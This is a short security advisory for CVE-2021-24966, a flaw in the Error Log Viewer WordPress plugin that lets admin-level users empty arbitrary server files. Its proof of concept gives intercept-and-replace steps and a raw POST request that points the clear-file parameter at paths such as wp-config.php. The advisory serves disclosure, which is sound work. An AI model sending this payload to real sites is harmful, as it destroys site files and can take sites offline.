Error Log Viewer Plugin < 1.1.2 – Admin+ Arbitrary File Clearing | CVE 2021-24966

Description

The plugin does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder

Proof of Concept

Click the "Log Monitor" available under Error Log Viewer menu item.
Choose a log file to clear.
Intercept the request via Burp or any other local proxy tool.
Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
Check the content of the cleared file. You will see that the file is empty.


POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

rrrlgvwr_clear_file=&rrrlgvwr_clear_file_name=/var/www/secret.php&rrrlgvwr_nonce_name=696d5e6ba3